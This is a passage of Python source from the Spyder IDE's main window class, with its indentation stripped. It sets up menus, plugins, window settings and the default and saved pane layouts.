if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except (ImportError, AssertionError):
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# ViTables
vitables_act = create_program_action(self, _("ViTables"),
"vitables", 'vitables.png')
if vitables_act:
self.external_tools_menu_actions += [None, vitables_act]
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
self.debug_print(" ..plugin: internal console")
from spyder.plugins.console import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Working directory plugin
self.debug_print(" ..plugin: working directory")
from spyder.plugins.workingdirectory import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help import Help
self.help = Help(self)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer import OutlineExplorer
fullpath_sorting = CONF.get('editor', 'fullpath_sorting', True)
self.outlineexplorer = OutlineExplorer(self,
fullpath_sorting=fullpath_sorting)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [None, restart_action, quit_action]
self.set_splash("")
self.debug_print(" ..widgets")
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# External console
self.set_splash(_("Loading external console..."))
from spyder.plugins.externalconsole import ExternalConsole
self.extconsole = ExternalConsole(self)
self.extconsole.register_plugin()
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# IPython console
if QTCONSOLE_INSTALLED:
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole import IPythonConsole
self.ipyconsole = IPythonConsole(self)
self.ipyconsole.register_plugin()
self.set_splash(_("Setting up main window..."))
# Help menu
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
doc_path = get_module_data_path('spyder', relpath="doc",
attr_name='DOCPATH')
# * Trying to find the chm doc
spyder_doc = osp.join(doc_path, "Spyderdoc.chm")
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, os.pardir, "Spyderdoc.chm")
# * Trying to find the html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(doc_path, "index.html")
# * Trying to find the development-version html doc
if not osp.isfile(spyder_doc):
spyder_doc = osp.join(get_module_source_path('spyder'),
os.pardir, 'build', 'lib', 'spyder',
'doc', "index.html")
# * If we totally fail, point to our web build
if not osp.isfile(spyder_doc):
spyder_doc = 'http://pythonhosted.org/spyder'
else:
spyder_doc = file_uri(spyder_doc)
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"))
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [doc_action, tut_action, self.tours_menu,
MENU_SEPARATOR, report_action, dep_action,
self.check_updates_action, support_action,
MENU_SEPARATOR]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.ipyconsole is not None and self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"))
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# Third-party plugins
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
#----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_dockwidgets_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
self.debug_print("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
'projects', 'tools', 'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
except TypeError:
pass
self.debug_print("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# Remove our temporary dir
atexit.register(self.remove_tmpdir)
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# In MacOS X 10.7 our app is not displayed after initialized (I don't
# know why because this doesn't happen when started from the terminal),
# so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if CONF.get('main', 'single_instance') and not self.new_instance:
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emmited by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
self.extconsole.setMinimumHeight(0)
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status of dockidgets (panes)
self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
self.apply_panes_settings()
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = []
if self.help is not None:
plugins_to_show.append(self.help)
if self.ipyconsole is not None:
if self.ipyconsole.isvisible:
plugins_to_show += [self.extconsole, self.ipyconsole]
else:
plugins_to_show += [self.ipyconsole, self.extconsole]
else:
plugins_to_show += [self.extconsole]
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
ipy_visible = self.ipyconsole is not None and self.ipyconsole.isvisible
if not self.extconsole.isvisible and not ipy_visible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates()
# Show dialog with missing dependencies
self.report_missing_dependencies()
self.is_setting_up = False
def update_window_title(self):
"""Update main spyder window title based on projects."""
title = self.base_title
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), '~')
title = '{0} - {1}'.format(path, title)
self.setWindowTitle(title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See issue 3748
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main'):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
qba = self.saveState()
CONF.set(section, prefix+'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
self.extconsole.setMinimumHeight(250)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section)
CONF.set(section, prefix+'state', None)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section)
self.current_quick_layout = 'default'
CONF.set(section, prefix+'state', None)
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in self.widgetlist:
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time"""
self.set_window_settings(*settings)
self.setUpdatesEnabled(False)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(4)
# define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_ext = self.extconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# layouts are organized by columns, each colum is organized by rows
# widths have to add 1.0, height per column have to add 1.0
# Spyder Default Initial Layout
s_layout = {'widgets': [
# column 0
[[explorer_project]],
# column 1
[[editor]],
# column 2
[[outline]],
# column 3
[[help_plugin, explorer_variable, helper, explorer_file,
finder] + plugins,
[console_int, console_ext, console_ipy, history]]
],
'width fraction': [0.0, # column 0 width
0.55, # column 1 width
0.0, # column 2 width
0.45], # column 3 width
'height fraction': [[1.0], # column 0, row heights
[1.0], # column 1, row heights
[1.0], # column 2, row heights
[0.46, 0.54]], # column 3, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
r_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_ext, console_int]],
# column 1
[[explorer_variable, history, outline, finder] + plugins,
[explorer_file, explorer_project, help_plugin, helper]]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Matlab
m_layout = {'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_ext, console_int]],
# column 2
[[explorer_variable, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.20, # column 0 width
0.40, # column 1 width
0.40], # column 2 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45], # column 1, row heights
[0.55, 0.45]], # column 2, row heights
'hidden widgets': [],
'hidden toolbars': [],
}
# Vertically split
v_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_ext, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # column 0 width
'height fraction': [[0.55, 0.45]], # column 0, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Horizontally split
h_layout = {'widgets': [
# column 0
[[editor]],
# column 1
[[console_ipy, console_ext, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[1.0], # column 0, row heights
[1.0]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': []
}
# Layout selection
layouts = {'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout}
layout = layouts[index]
widgets_layout = layout['widgets']
widgets = []
for column in widgets_layout :
for row in column:
for widget in row:
if widget is not None:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
action = widget.toggle_view_action
try:
action.setChecked(widget.dockwidget.isVisible())
except AttributeError:
pass
# Set the widgets horizontally
for i in range(len(widgets) - 1):
first, second = widgets[i], widgets[i+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
Qt.Horizontal)
# Arrange rows vertically
for column in widgets_layout :
for i in range(len(column) - 1):
first_row, second_row = column[i], column[i+1]
if first_row is not None and second_row is not None:
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout :
for row in column:
for i in range(len(row) - 1):
first, second = row[i], row[i+1]
if first is not None and second is not None:
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = global_hidden_widgets + layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
# set the width and height
self._layout_widget_info = []
width, height = self.window_size.width(), self.window_size.height()
# fix column width
# for c in range(len(widgets_layout)):
# widget = widgets_layout[c][0][0].dockwidget
# min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
# info = {'widget': widget,
# 'min width': min_width,
# 'max width': max_width}
# self._layout_widget_info.append(info)
# new_width = int(layout['width fraction'][c] * width * 0.95)
# widget.setMinimumWidth(new_width)
# widget.setMaximumWidth(new_width)
# widget.updateGeometry()
# print(c, widgets_layout[c][0][0], new_width)
# fix column height
for c, column in enumerate(widgets_layout):
for r in range(len(column) - 1):
widget = column[r][0]
dockwidget = widget.dockwidget
dock_min_h = dockwidget.minimumHeight()
dock_max_h = dockwidget.maximumHeight()
info = {'widget': widget,
'dock min height': dock_min_h,
'dock max height': dock_max_h}
self._layout_widget_info.append(info)
# The 0.95 factor is to adjust height based on usefull
# estimated area in the window
new_height = int(layout['height fraction'][c][r]*height*0.95)
dockwidget.setMinimumHeight(new_height)
dockwidget.setMaximumHeight(new_height)
self._custom_layout_timer = QTimer(self)
self._custom_layout_timer.timeout.connect(self.layout_fix_timer)
self._custom_layout_timer.setSingleShot(True)
self._custom_layout_timer.start(5000)
def layout_fix_timer(self):
"""Fixes the height of docks after a new layout is set."""
info = self._layout_widget_info
for i in info:
dockwidget = i['widget'].dockwidget
if 'dock min width' in i:
dockwidget.setMinimumWidth(i['dock min width'])
dockwidget.setMaximumWidth(i['dock max width'])
if 'dock min height' in i:
dockwidget.setMinimumHeight(i['dock min height'])
dockwidget.setMaximumHeight(i['dock max height'])
dockwidget.updateGeometry()
self.setUpdatesEnabled(True)
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
